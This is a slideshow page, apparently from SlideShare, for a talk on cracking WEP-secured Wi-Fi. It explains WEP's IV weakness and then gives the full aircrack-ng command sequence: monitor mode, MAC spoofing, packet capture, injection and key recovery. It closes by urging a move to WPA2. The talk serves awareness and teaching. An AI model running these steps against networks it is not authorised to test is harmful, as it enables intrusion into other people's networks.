Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
SlideShare a Scribd company logo

Cracking WEP Secured Wireless Networks

Hammam Samara
Hammam Samara

This document discusses cracking WEP secured wireless networks. It begins by explaining that WEP is an outdated protocol with known weaknesses that can be cracked within minutes using readily available software. It then provides details on WEP authentication methods and how the encryption works. The main weakness discussed is that the 24-bit initialization vector is not long enough to ensure uniqueness, allowing the key to be cracked. The document concludes by demonstrating how to enable monitor mode, attack a target network to capture packets, and use those packets to crack the WEP key in minutes using aircrack-ng software on BackTrack Linux. It advises moving to more secure WPA or WPA2 encryption.

Related slideshows

Iuwne10 S04 L05
Iuwne10 S04 L05Iuwne10 S04 L05
Iuwne10 S04 L05
 
802.11i
802.11i802.11i
802.11i
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
 
1 of 13
Cracking WEP Secured Wireless Networks Hammam Samara
What is WEP Stands for Wired Equivalent Privacy. 13 years old protocol. (even older than Google!). Several serious weaknesses in this protocol have been identified since the early starts. Can be cracked with readily available software within minutes! I never believed until try it my self! - so this session. Despite that, WEP is still widely in use! and often the first security choice presented to user by router config. tools.
WEP Authentication Two methods of authentication can be used with WEP: Open System authentication After the authentication and association, the client needs to have the right keys. Shared Key authentication. Four-way challenge-response handshake is used. Which way is Stronger ?
How is works Basic WEP encryption: RC4 keystream XORed with plain-text.
So, Where is the weakness? In the IV's it selves! a 24-bit IV is not long enough to ensure this on a busy network. There is a 50% probability the same IV will repeat after 5000 packets. Network not busy ? We could make it so! ;-) There are ways for an attacker to send packets on the network and thereby stimulate reply packets which can then be inspected to find the key. Now freely available software such as aircrack-ng can crack any WEP key in minutes.
Still Not believe it ? I used to too.
Lets Try it Requirements: BackTrack 3 on CD or USB. Computer with compatible 802.11 wireless card. Wireless Access point or WIFI router using WEP encryption.
Enabling Monitor Mode. Procedure: Boot From Backtrack3 Live CD and open kernal window. First is enabling "Monitor mode" for your wifi card. For Intel PROWireless3945ABG modprobe -r iwl3945 modprobe ipwraw Now Stop the wifi card. iwconfig airmon-ng stop [device] airmon-ng [device] down Change the mac address to a fake one: macchanger --mac 00:11:22:33:44:55 [device] airmong-ng start [device]
Attacking The target. Procedure: Discover all wireless network in range. We will using AiroDump for this purpose. airodump-ng [device] Now Choose a target. airodump-ng -c [channel] -w [filename] --bssid [bssied] [device] Now to speed up the data output:(open another consol) aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] [devcie] aireply-ng -3 -b [bssid] -h 00:11:22:33:44: 55 [device]
Attacking The target. Procedure: Now if you have enough packets, you can begin the crack. But if not ? use the following command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:55 [device] This will force the AP to generate more and more packets. Wait after you get > 20,000 packets and start new consol window. aircrack-ng -n 128 -b [bssid] [filename]-01.cap you may also try -n to be 64 bit if cracking fails. Once the Aircrack is done, you will be left with the key!
Now What you could do about it ? Nothing! Just Move to WPA (Wi-Fi Protected Access) wireless security. But while you there switching your security protocols, what about choosing WPA2. For you it is just an option, but actually you are making a big difference for your network crackers.
Thank you For Lestining. And Do not forget to secure your wireless
Materials BackTrack3 ISO File: FTP: http://www.filewatcher.com/m/bt3-final.iso.728705024.0.0.html Torrent: http://thepiratebay.org/torrent/4250350/Backtrack_3_Final_-_ISO Step by Step tutorial: http://goo.gl/1Yq2 Video tutorial: http://www.youtube.com/watch?v=kDD9PjiQ2_U Cracking WEP on Windows: http://tazforum.thetazzone.com/viewtopic.php?t=2069.

More Related Content

Cracking WEP Secured Wireless Networks

  • 1. Cracking WEP Secured Wireless Networks Hammam Samara
  • 2. What is WEP Stands for Wired Equivalent Privacy. 13 years old protocol. (even older than Google!). Several serious weaknesses in this protocol have been identified since the early starts. Can be cracked with readily available software within minutes! I never believed until try it my self! - so this session. Despite that, WEP is still widely in use! and often the first security choice presented to user by router config. tools.
  • 3. WEP Authentication Two methods of authentication can be used with WEP: Open System authentication After the authentication and association, the client needs to have the right keys. Shared Key authentication. Four-way challenge-response handshake is used. Which way is Stronger ?
  • 4. How is works Basic WEP encryption: RC4 keystream XORed with plain-text.
  • 5. So, Where is the weakness? In the IV's it selves! a 24-bit IV is not long enough to ensure this on a busy network. There is a 50% probability the same IV will repeat after 5000 packets. Network not busy ? We could make it so! ;-) There are ways for an attacker to send packets on the network and thereby stimulate reply packets which can then be inspected to find the key. Now freely available software such as aircrack-ng can crack any WEP key in minutes.
  • 6. Still Not believe it ? I used to too.
  • 7. Lets Try it Requirements: BackTrack 3 on CD or USB. Computer with compatible 802.11 wireless card. Wireless Access point or WIFI router using WEP encryption.
  • 8. Enabling Monitor Mode. Procedure: Boot From Backtrack3 Live CD and open kernal window. First is enabling "Monitor mode" for your wifi card. For Intel PROWireless3945ABG modprobe -r iwl3945 modprobe ipwraw Now Stop the wifi card. iwconfig airmon-ng stop [device] airmon-ng [device] down Change the mac address to a fake one: macchanger --mac 00:11:22:33:44:55 [device] airmong-ng start [device]
  • 9. Attacking The target. Procedure: Discover all wireless network in range. We will using AiroDump for this purpose. airodump-ng [device] Now Choose a target. airodump-ng -c [channel] -w [filename] --bssid [bssied] [device] Now to speed up the data output:(open another consol) aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] [devcie] aireply-ng -3 -b [bssid] -h 00:11:22:33:44: 55 [device]
  • 10. Attacking The target. Procedure: Now if you have enough packets, you can begin the crack. But if not ? use the following command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:55 [device] This will force the AP to generate more and more packets. Wait after you get > 20,000 packets and start new consol window. aircrack-ng -n 128 -b [bssid] [filename]-01.cap you may also try -n to be 64 bit if cracking fails. Once the Aircrack is done, you will be left with the key!
  • 11. Now What you could do about it ? Nothing! Just Move to WPA (Wi-Fi Protected Access) wireless security. But while you there switching your security protocols, what about choosing WPA2. For you it is just an option, but actually you are making a big difference for your network crackers.
  • 12. Thank you For Lestining. And Do not forget to secure your wireless
  • 13. Materials BackTrack3 ISO File: FTP: http://www.filewatcher.com/m/bt3-final.iso.728705024.0.0.html Torrent: http://thepiratebay.org/torrent/4250350/Backtrack_3_Final_-_ISO Step by Step tutorial: http://goo.gl/1Yq2 Video tutorial: http://www.youtube.com/watch?v=kDD9PjiQ2_U Cracking WEP on Windows: http://tazforum.thetazzone.com/viewtopic.php?t=2069.